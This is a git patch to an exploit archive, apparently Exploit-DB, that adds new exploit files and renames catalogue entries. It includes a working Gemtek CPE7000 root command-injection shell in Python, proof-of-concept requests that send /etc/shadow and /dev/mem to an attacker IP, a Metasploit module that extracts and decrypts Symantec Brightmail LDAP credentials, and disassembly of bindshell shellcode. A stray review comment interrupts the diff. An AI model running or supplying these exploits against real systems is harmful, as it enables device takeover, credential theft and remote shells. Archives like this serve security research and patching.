From 22a4c5d4ccb84bd2ebd53bddc66ca42e113317d0 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 22 Apr 2016 05:03:45 +0000
Subject: [PATCH] DB: 2016-04-22
5 new exploits
freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability
FreePBX 2.1.3 - (upgrade.php) Remote File Include Vulnerability
FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution
FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution
FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution
FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities
FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities
FreePBX config.php Remote Code Execution
FreePBX - config.php Remote Code Execution
FreePBX 2.5.2 admin/config.php tech Parameter XSS
FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS
FreePBX 2.5.2 - admin/config.php tech Parameter XSS
FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities
Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure
Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities
Linux/x86_64 - bindshell (Port 5600) - 86 bytes
Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)
---
 files.csv | 19 +-
 platforms/hardware/webapps/39716.py | 227 ++++++++
 platforms/java/webapps/39715.rb | 308 ++++++++++
 platforms/lin_x86-64/shellcode/39718.c | 88 +++
 platforms/php/webapps/39714.txt | 767 +++++++++++++++++++++++++
 platforms/windows/local/39719.ps1 | 372 ++++++++++++
 6 files changed, 1774 insertions(+), 7 deletions(-)
 create mode 100755 platforms/hardware/webapps/39716.py
 create mode 100755 platforms/java/webapps/39715.rb
 create mode 100755 platforms/lin_x86-64/shellcode/39718.c
 create mode 100755 platforms/php/webapps/39714.txt
 create mode 100755 platforms/windows/local/39719.ps1
diff --git a/files.csv b/files.csv
index 438933d0a..909462bd5 100755
--- a/files.csv
+++ b/files.csv
@@ -2355,7 +2355,7 @@ id,file,description,date,author,platform,type,port
 2662,platforms/asp/webapps/2662.txt,"Hosting Controller <= 6.1 Hotfix 3.2 - Remote Unauthenticated Vulnerabilities",2006-10-27,"Soroush Dalili",asp,webapps,0
 2663,platforms/php/webapps/2663.txt,"PhpShop Core <= 0.9.0 RC1 - (PS_BASE) File Include Vulnerabilities",2006-10-28,"Cold Zero",php,webapps,0
 2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0beta (viewticket.php) Local Include Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0
-2665,platforms/php/webapps/2665.txt,"freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
+2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
 2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 (Core/core.inc.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
 2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
 2668,platforms/php/webapps/2668.htm,"MiraksGalerie <= 2.62 (pcltar.lib.php) Remote File Include Exploit",2006-10-28,ajann,php,webapps,0
@@ -13155,7 +13155,7 @@ id,file,description,date,author,platform,type,port
 15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0
 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0
 15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0
-15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
+15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
 15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0
 15102,platforms/win32/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win32,webapps,80
 15103,platforms/windows/dos/15103.py,"VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0
@@ -16169,7 +16169,7 @@ id,file,description,date,author,platform,type,port
 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
 18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
 18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_",2012-03-24,metasploit,windows,remote,0
-18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
+18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
 18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0
 18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0
 18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin Vulnerability",2012-03-28,Dr.NaNo,php,webapps,0
@@ -26981,7 +26981,7 @@ id,file,description,date,author,platform,type,port
 29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
 29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0
-29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
+29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.PHP Remote File Include Vulnerability",2007-04-20,Omni,php,webapps,0
 29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service Vulnerability",2007-04-21,"Levent Kayan",multiple,dos,0
 29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 You.PHP Cross-Site Scripting Vulnerability",2007-04-23,the_Edit0r,php,webapps,0
@@ -27497,7 +27497,7 @@ id,file,description,date,author,platform,type,port
 32417,platforms/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0
 32416,platforms/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0
 32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0
-32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
+32512,platforms/unix/remote/32512.rb,"FreePBX - config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
 32413,platforms/php/webapps/32413.txt,"InterTech WCMS 'etemplate.php' SQL Injection Vulnerability",2008-09-23,"GeNiUs IrAQI",php,webapps,0
 32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal Vulnerability",2008-09-23,AlbaniaN-[H],asp,webapps,0
 32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-23,"Hadi Kiamarsi",php,webapps,0
@@ -30153,8 +30153,8 @@ id,file,description,date,author,platform,type,port
 33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
 33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0
 33441,platforms/php/webapps/33441.txt,"Joomla! Joomulus Component 2.0 - 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-12-28,MustLive,php,webapps,0
-33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
-33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
+33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
+33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
 33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Include Vulnerability",2009-12-28,Securitylab.ir,php,webapps,0
 33445,platforms/php/webapps/33445.txt,"phpInstantGallery 1.1 - 'admin.php' Cross-Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
 33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
@@ -35931,3 +35931,8 @@ id,file,description,date,author,platform,type,port
 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
 39712,platforms/win64/dos/39712.txt,"Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win64,dos,0
 39713,platforms/windows/dos/39713.c,"Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0
+39714,platforms/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80
+39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443
+39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
+39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
+39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0
diff --git a/platforms/hardware/webapps/39716.py b/platforms/hardware/webapps/39716.py
new file mode 100755
index 000000000..0b8b53f12
--- /dev/null
+++ b/platforms/hardware/webapps/39716.py
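Review bot: The new 39715 row's description, `Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure`, glues a hyphen onto the version and omits the ` - ` separator that the other hunks in this same commit (the FreePBX rows at 2665, 15098, 18659, 29873, 32512, 33442 and 33443) are introducing as the catalogue convention. Writing it as `"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure"` keeps the title consistent with both the renamed rows and the four other new entries, all of which already use the separator. The advisory text in 39715.rb states the affected range as "10.6.0-7 and earlier", so the version string itself is correct and only the separator needs the fix.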
@@ -0,0 +1,227 @@ +#!/usr/bin/python + +''' +# Exploit Title: Gemtek CPE7000 / WLTCS-106 multiple vulnerabilities +# Date: 04/06/2016 +# Exploit Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is +# Vendor Homepage: gemtek.com.tw +# Version: Firmware Version 01.01.02.082 +# Tested on: +# Product Name : CPE7000 +# Model ID : WLTCS-106 +# Hardware Version : V02A +# Firmware Version : 01.01.02.082 + +1) SID leak / auth bypass +The sysconfg cgi application leaks a valid "SID" (session id) when the +following unauthenticated request is made: +Request: GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1 + +The response body has the form: , +Example resp: RJIi,BtsS2OdhcVSbviDC5iMa1MKeo9rbrgdQ + +The sid thus obtained can be used to "unlock" the cliend-side administration +interface and/or to directly issue request that are usually restricted to +administrative accounts. + +POCs: + +I) Unauthenticated remote reboot: +Request: +/cgi-bin/sysconf.cgi?page=ajax_check.asp&action=reboot&reason=1&sid= + +II) Web admin interface access. Add a new cookie with the following values: +userlevel=2 +sid= + +-------------------------------------------------------------------------------- + +2) Arbitrary file download - with root privileges - via iperf tool +One of the diagnostic tools available on the device can be used to read an +arbitrary file on the device. The sysconfg cgi application fails to sanitize +user input, allowing an attacker to hijack the command issued to the "iperf" +binary, a commonly-used network testing tool that can create TCP and UDP data +streams and measure the throughput of a network that is carrying them. + +The client-side validation can be easily bypassed by changing the javascript +validation code, or by directly sending a forged request to the server. +The iperf tool is run with the -c switch, meaning that it is behaving as a +client that sends data to a server. 
By adding the -F parameter, iperf is forced +to read data from a file instead of generating random data to be sent during the +measurement. + +This attack needs 2 step in order to take advantage of the vulnerability. +The first request sets up the command be to run, the second one (a.k.a. toggle) +actually runs the command (check the response body, 1 means running, 0 means stopped). + +The following "SETUP" request can be used to set the correct parameters: +/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i +p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_ +test_time=ZZ&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024& +perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20 + +Parameters breakdown: +XXX.XXX.XXX.XXX = attacker ip +YYYY = attacker listening port +zz = time limit +Note: nc is enough to capture data, which may be sent with some additional +header and footer introduced by iperf's protocol + +In order to run iperf, the following "TOGGLE" (run/stop) request must be sent: +/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle + + +POCs: +I) download of /etc/shadow +SETUP REQUEST: +/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i +p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_ +test_time=30&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&p +erf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fetc%2fshadow + +RUN/STOP(Toggle) REQUEST: +/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle + + +II) download of device physical memory (/dev/mem) with increased perf_measure_test_time: +SETUP REQUEST: +/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i +p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_ +test_time=6000&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024 
+&perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fdev%2fmem + +RUN/STOP(Toggle) REQUEST: +/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle + +-------------------------------------------------------------------------------- + +3) Unauthenticated remote root command execution +The same vulnerability can be used to issue an arbitrary command on the device. +The command executed on the system to run the diagnostic tool is constructed +using the sprintf function and the following format string, with no additional +checks: + +iperf -c "%s" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt & + +It is therefore possible to insert another command by injecting it in the +"perf_measure_server_ip" parameter and commenting out the rest of the original +command. + +To concatenate a command, the string in the first half before the injection +point ( iperf -c " ) must be correctly closed with quotes ( " ). +Then the new command can be added, preceded by a semicolon ( ; ). +Finally, the other part of the original command after the "injection point" +must be commented out ( # ). 
+ +iperf -c ""; #" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt & + + +SETUP REQUEST: +/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i +p=%22%3b%20%20%23&perf_measure_server_port=5555&perf_measure_cpe_p +ort=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_pac +ket_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1 + +RUN/STOP(Toggle) REQUEST: +/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle + + +POC (echo test > /www/test): +/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i +p=%22%3b%20echo%20test%20%3E%20%2fwww%2ftest%20%23&perf_measure_server_port=5555 +&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type +=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_ +client_num=1 + +and toggle: +/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle + +-------------------------------------------------------------------------------- + +Remediation: +Disable wan access to the management web interface until an updated firmware is released. 
+ +More information and a detailed how-to is available at: http://www.mentat.is/docs/cpe7000-multiple-vulns.html +''' + +#Gemtek CPE7000 / WLTCS-106 remote root command execution +#Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is +# Tested on: +# Product Name : CPE7000 +# Model ID : WLTCS-106 +# Hardware Version : V02A +# Firmware Version : 01.01.02.082 + +import httplib +import ssl +import urllib +import time +import sys +import getopt +import socket + +ssl._create_default_https_context = ssl._create_unverified_context + +host='' +port = 443 + +def check(): + try: + conn = httplib.HTTPSConnection(host +":"+str(port), timeout=10) + conn.request("GET", "/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1") + r1 = conn.getresponse() + if r1.status != 200: + return False + return True + except socket.error as msg: + print "Cannot connect"; + sys.exit(); + + +def sendcmd( cmd ): + resource = '"; ' + cmd + ' &> /www/cmdoutput.txt #' + urlencoded = urllib.quote_plus(resource) + cmdresource = "/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_ip=" +urlencoded + "&perf_measure_server_port=5555&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1" + res = makereq (cmdresource) + res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle") + if(res!="1"): + res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle") + time.sleep(1) + res = makereq ("/cmdoutput.txt") + print res + + +def makereq (resource): + conn = httplib.HTTPSConnection(host +":"+str(port)) + conn.request("GET", resource) + r1 = conn.getresponse() + body = r1.read() + return body + + +if len(sys.argv) < 2: + print 'GemtekShell.py [ (443)]' + exit() +elif len(sys.argv) > 2: + port = sys.argv[2] + +host = sys.argv[1] + +print 'Connecting to ', host, port + +if not check() : + print 
"Host seems not vulnerable" + sys.exit() + + +while(1): + cmd = raw_input("gemtekCMD> ") + if cmd.strip() != "quit" : + sendcmd(cmd) + else : + sys.exit() + + + + diff --git a/platforms/java/webapps/39715.rb b/platforms/java/webapps/39715.rb new file mode 100755 index 000000000..5823e7db0 --- /dev/null +++ b/platforms/java/webapps/39715.rb 
@@ -0,0 +1,308 @@ +# Exploit Title: Symantec Brightmail ldap credential Grabber +# Date: 18/04/2016 +# Exploit Author: Fakhir Karim Reda +# Vendor Homepage: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year&suid=20160418_00 +# Version: 10.6.0-7 and earlier +# Tested on: Linux, Unox Windows +# CVE : CVE-2016-2203 + + +#Symantec Brightmail 10.6.0-7 and earlier save the AD password somewhere in the product. By having a read account on the gateway we can recover the AD #ACOUNT/PASSWORD + +#indeed the html code contains the encrypted AD password. + +#the encryption and decryption part is implemented in Java in the appliance, by reversing the code we get to know the encryption algorithm: + +#public static String decrypt(String password) +#{ +#byte clearText[]; +#try{ +#PBEKeySpec keySpec = new PBEKeySpec("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"{}`~!@#$%^&*()_+-=".toCharArray()); +#SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWithMD5AndDES"); +#SecretKey secretKey = keyFactory.generateSecret(keySpec); +#System.out.println("Encoded key "+ (new String(secretKey.getEncoded()))); + + +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require "base64" +require 'digest' +require "openssl" + + +class MetasploitModule < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Symantec Messaging Gateway 10 LDAP Creds Graber', + 'Description' => %q{ + This module will grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key. Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account. 
Version 10.6.0-7 and earlier are affected + + }, + 'References' => + [ + ['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'], + ['CVE','2016-2203'], + ['BID','86137'] + ], + + 'Author' => + [ + 'Fakhir Karim Reda ' + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'SSLVersion' => 'TLS1', + 'RPORT' => 443 + }, + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Dec 17 2015" + )) + register_options( + [ + OptInt.new('TIMEOUT', [true, 'HTTPS connect/read timeout in seconds', 1]), + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']) + ], self.class) + deregister_options('RHOST') + end + + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + + def report_cred(opts) + service_data = { + address: opts[:ip], + port: opts[:port], + service_name: 'LDAP', + protocol: 'tcp', + workspace_id: myworkspace_id + } + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + private_data: opts[:password], + private_type: :password + }.merge(service_data) + login_data = { + last_attempted_at: DateTime.now, + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end + + def auth(username, password, sid, last_login) + # Real JSESSIONID cookie + sid2 = '' + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/brightmail/login.do', + 'headers' => { + 'Referer' => "https://#{peer}/brightmail/viewLogin.do", + 'Connection' => 'keep-alive' + }, + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}", + 'vars_post' => { + 'lastlogin' => last_login, + 'userLocale' => '', + 
'lang' => 'en_US', + 'username' => username, + 'password' => password, + 'loginBtn' => 'Login' + } + }) + if res.body =~ /Logged in/ + sid2 = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || '' + return sid2 + end + if res and res.headers['Location'] + mlocation = res.headers['Location'] + new_uri = res.headers['Location'].scan(/^http:\/\/[\d\.]+:\d+(\/.+)/).flatten[0] + res = send_request_cgi({ + 'uri' => new_uri, + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}" + }) + sid2 = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || '' + return sid2 if res and res.body =~ /Logged in/ + end + return false + end + + def get_login_data + sid = '' #From cookie + last_login = '' #A hidden field in the login page + res = send_request_raw({'uri'=>'/brightmail/viewLogin.do'}) + if res and !res.get_cookies.empty? + sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || '' + end + if res + last_login = res.body.scan(//).flatten[0] || '' + end + return sid, last_login + end + + # Returns the status of the listening port. + # + # @return [Boolean] TrueClass if port open, otherwise FalseClass. + + def port_open? + begin + res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT']) + return true if res + rescue ::Rex::ConnectionRefused + print_status("#{peer} - Connection refused") + return false + rescue ::Rex::ConnectionError + print_error("#{peer} - Connection failed") + return false + rescue ::OpenSSL::SSL::SSLError + print_error("#{peer} - SSL/TLS connection error") + return false + end + end + + # Returns the derived key from the password, the salt and the iteration count number. + # + # @return Array of byte containing the derived key. 
+ def get_derived_key(password, salt, count) + key = password + salt + for i in 0..count-1 + key = Digest::MD5.digest(key) + end + kl = key.length + return key[0,8], key[8,kl] + end + + + # @Return the deciphered password + # Algorithm obtained by reversing the firmware + # + def decrypt(enc_str) + pbe_key="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-=" + salt = (Base64.strict_decode64(enc_str[0,12])) + remsg = (Base64.strict_decode64(enc_str[12,enc_str.length])) + (dk, iv) = get_derived_key(pbe_key, salt, 1000) + alg = "des-cbc" + decode_cipher = OpenSSL::Cipher::Cipher.new(alg) + decode_cipher.decrypt + decode_cipher.padding = 0 + decode_cipher.key = dk + decode_cipher.iv = iv + plain = decode_cipher.update(remsg) + plain << decode_cipher.final + return plain.gsub(/[\x01-\x08]/,'') + end + + def grab_auths(sid,last_login) + token = '' #from hidden input + selected_ldap = '' # from checkbox input + new_uri = '' # redirection + flow_id = '' # id of the flow + folder = '' # symantec folder + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/brightmail/setting/ldap/LdapWizardFlow$exec.flo", + 'headers' => { + 'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo", + 'Connection' => 'keep-alive' + }, + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid};" + }) + if res + token = res.body.scan(//).flatten[0] || '' + selected_ldap = res.body.scan(//).flatten[0] || '' + else + return false + end + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/brightmail/setting/ldap/LdapWizardFlow$edit.flo", + 'headers' => { + 'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo", + 'Connection' => 'keep-alive' + }, + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ", + 'vars_post' => { + 'flowId' => '0', + 'userLocale' => '', + 'lang' => 'en_US', + 'symantec.brightmail.key.TOKEN'=> "#{token}", + 'selectedLDAP' => "#{selected_ldap}" + 
} + }) + if res and res.headers['Location'] + mlocation = res.headers['Location'] + new_uri = res.headers['Location'].scan(/^https:\/\/[\d\.]+(\/.+)/).flatten[0] + flow_id = new_uri.scan(/.*\?flowId=(.+)/).flatten[0] + folder = new_uri.scan(/(.*)\?flowId=.*/).flatten[0] + else + return false + end + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{folder}", + 'headers' => { + 'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo", + 'Connection' => 'keep-alive' + }, + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ", + 'vars_get' => { + 'flowId' => "#{flow_id}", + 'userLocale' => '', + 'lang' => 'en_US' + } + }) + if res and res.code == 200 + login = res.body.scan(//).flatten[0] || '' + password = res.body.scan(//).flatten[0] || '' + host = res.body.scan(/: + 400080: 48 31 c0 xor %rax,%rax + 400083: 48 31 f6 xor %rsi,%rsi + 400086: 99 cltd + 400087: 6a 29 pushq $0x29 + 400089: 58 pop %rax + 40008a: ff c6 inc %esi + 40008c: 6a 02 pushq $0x2 + 40008e: 5f pop %rdi + 40008f: 0f 05 syscall + 400091: 48 97 xchg %rax,%rdi + 400093: 6a 02 pushq $0x2 + 400095: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp) + 40009c: 54 push %rsp + 40009d: 5e pop %rsi + 40009e: 52 push %rdx + 40009f: 6a 10 pushq $0x10 + 4000a1: 5a pop %rdx + 4000a2: 6a 31 pushq $0x31 + 4000a4: 58 pop %rax + 4000a5: 0f 05 syscall + 4000a7: 50 push %rax + 4000a8: 5e pop %rsi + 4000a9: 6a 32 pushq $0x32 + 4000ab: 58 pop %rax + 4000ac: 0f 05 syscall + 4000ae: 6a 2b pushq $0x2b + 4000b0: 58 pop %rax + 4000b1: 0f 05 syscall + 4000b3: 48 97 xchg %rax,%rdi + 4000b5: 6a 03 pushq $0x3 + 4000b7: 5e pop %rsi + 4000b8: ff ce dec %esi + 4000ba: b0 21 mov $0x21,%al + 4000bc: 0f 05 syscall + 4000be: 75 f8 jne 0x4000b8 + 4000c0: 48 31 c0 xor %rax,%rax + 4000c3: 99 cltd + 4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx + 4000cb: 2f 73 68 + 4000ce: 53 push %rbx + 4000cf: 54 push %rsp + 4000d0: 5f pop %rdi + 4000d1: 6a 3b pushq $0x3b + 4000d3: 58 pop %rax + 
